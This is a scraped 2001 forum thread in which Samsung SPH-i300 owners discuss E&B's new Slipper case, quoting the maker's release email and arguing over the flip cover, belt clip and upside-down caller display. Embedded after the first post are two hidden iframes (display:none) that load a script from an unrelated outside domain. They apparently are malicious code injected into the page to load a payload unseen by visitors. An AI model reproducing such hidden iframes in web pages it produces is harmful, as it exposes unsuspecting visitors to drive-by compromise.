+ Reply to Thread

E&B I300 case in production

Just got word from Michelle at E & B today that the I300 case is now in production. Here's a link to the page...

http://www.ebcases.com/Detail.bok?&no=117

-Doug<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Me too. Here's the email:

Dear SamSung SPH-i300 owner:

You expressed an interest in a case for this new machine. We have released
    our new Slipper i300 and Slipper i300 w/clip designed specifically for the
    SamSung SPH-i300.

We have incorporated many of the features suggested in your emails. Some of
    the key features include:

- Ability to hot-sync with a cable or easy access to the machine
    - Slim design
    - All buttons and keys accessible
    - 1 pocket for business cards
    - 1 pocket for folded money
    - Magnetic closure*
    - and a case with belt clip.

We designed the case to add as little as possible to the dimension of the
    SamSung SPH-i300.

We have started production on this item and expect to start shipping it out
    on the last week of December. If the product stocks out after that, please
    allow 1-2 weeks for delivery.

For more product details please access this link:
    http://www.ebcases.com/Detail.bok?&no=117

http://www.ebcases.com/Detail.bok?&no=118

Thank you for your interest in our products and all the feedback provided.

Kind Regards,

New Product Release Team

I don't get it

Help me here - why would you want to have a case that covers the front of the phone - ? I know there's a need to protect the screen, but....isn't it going to be a hassle to actually USE the phone, with the case? Yes, you can flip the front over, and yes, you have caller ID on the top, but...I don't get it.
    Granted, I don't have an I-300, just a 6035, but my solution was to stick one of those belt tab things on the back, and use one of my old Nokia belt clips. Sure, the front is exposed, but it's also THERE to be used all the time. No flipping involved. Plus, the overall size of the unit (already on the large size anyway) was not affected.
    Clue me in, slipper case-lovers.

Administrator

Arrow

rossman..

you know how we were when the e and b version of the kyo case came out... most of us did not like the flap... why do they even need that blasted flap????? i specifically asked that they leave it out and referenced the kyo case.. i see no reason to have it... thats why i am let down again from e and b...

the case is great (just as the kyo case was) but if it wasnt for the blame flap....

(Click a sponser today!)

I don't get it

Reason for a flip cover?
    protection...protection...protection.

I have a similar Vaja case on my Palm IIIc and it has survived many hard drops and bumps because of that case.

Also very "Trekie" to flip that case open.
    Gary

Administrator

Arrow

trekie??? not really...

when the phone is ringing, i dont want to play star trek...

i have had phones without a cover or a case and they survived... even if the flap was off the case, you still have some protection as the screen is recessed...
    you could probably cut the flap off, but at 40 bucks... i dont think so....

I will be receiving my slipper I300 from E&B tomorrow (tueday, Dec. 18th). If you guys have any questions, post them and I'll try to answer them as soon as I get my case in.

I had an E & B case for my Palm V, and it was excellent. The flap was useful. The V would fit in the charger/syncher without removal of the case. But the flap on the case for the i300 makes it inconvenient to receive or make calls. And it is inconvenient to be forced to remove the unit from the case to charge/synch. E & B should consider leaving a window for the screen; the screen would not be fully protected, but the raised sides would help somewhat. And I believe that cutouts can be made on the lower back edges of the case so that the unit can fit on the charger without removing the case.

Screen facing out

Here's a thought, if you plan to wear this on your belt clip.

With the I300 screen facing outward (away from your body), the information on the top LCD screen will be upside-down when you're wearing it.

A simple oversight, given that they probably just make a quick mold of Marty's phone, and didn't actually have a working version to know that the top LCD display will be upside-down.

It's a nice case, but I don't know if it's enough to make me switch (and I'm still waiting to figure out whether I want to stick with the I300 full-time, or use my Visor Prism+Digital Link instead).

-Doug

If you think about it, if you wanted to make the case so that when it hung from your belt you could see the LCD correctly, they would have to anchor the belt clip to the flip lid and since the lid is made to open and close, it wouldn't make for a very sturdy anchoring structure. I actually alerted the case designer to this concern before he designed the case and I guess he chose to have the LCD read backwards instead of anchoring the belt clip to the lid.

(Click a sponser today!)

Upside down LCD

I guess someone better "hack" a screen inverter.

Re: The flap about the flap - it all depends on where you're coming from. I'm an all day Palm user adding occasional phone functionality. It sounds like many of you are phone junkies adding Palm functions.

I like the flap - different strokes....
    Gary

I wonder if the flap folds easily against the back of the phone..... otherwise you'll have the flap hanging over the top of your head when talking on the phone....

Brooks

Could be that it is simply a case....

When you use the i300 you pull it out of the case. If it is a quick check of the datebook, maybe you leave it in the case.

Like someone said.... different strokes.

Re: I don't get it

Originally posted by gpetty46
    Reason for a flip cover?
    protection...protection...protection.

I have a similar Vaja case on my Palm IIIc and it has survived many hard drops and bumps because of that case.

Also very "Trekie" to flip that case open.
    I'm with you. I've had the Slipper III for my Palm III for over a year and it has saved it and me numerous times. I was elated to get the same e-mail from Slipper and mine is already on order (w/clip).

but my point is....

the need to protect and use a Palm is different, in my opinion, than that of a phone/Palm combo. In all the various Palms I owned, I had various cases that covered the screen - side flips, top flips, wallet mode, etc. Vaja case for my Omnisky/Palm, combo - the list was/is endless. I could reconstruct a cow from all the cases I own(ed). But, with the phone, I need to have the screen always viewable, and I don't want to substantially increase the size of the unit.
    I've dropped my Kyocera 6035 no less than 5 times, and so far, no problems (it also survived a little waterlogging, floating in the back of a canoe - yikes!).
    So - no case for me. I live on the edge.

Just Ordered E&B

I just ordered the new case from E&B. Looks VERY cool and functional.

I will review it once I receive it. Especially look forward to being able to hot sync with the case still on.

Wondering if the phone will fit with the extended battery attached?

Rick

Re: but my point is....

Originally posted by nrosser
    the need to protect and use a Palm is different, in my opinion, than that of a phone/Palm combo.
    I think this comes down to what gpetty said. It depends on what you bought your i300 for. A review site said it best. The Kyocera is a phone that happens to double as a palm. The Samsung is a Palm that happens to double as a phone. About 95% of the time I'm using the i300 it is as the Palm. The phone part was simply a convienence, therefore the case I'm going to use is the case I liked for my palm...one of which I just ordered from E&B.
    Last edited by Rzrseg; 12-18-2001 at 03:24 PM.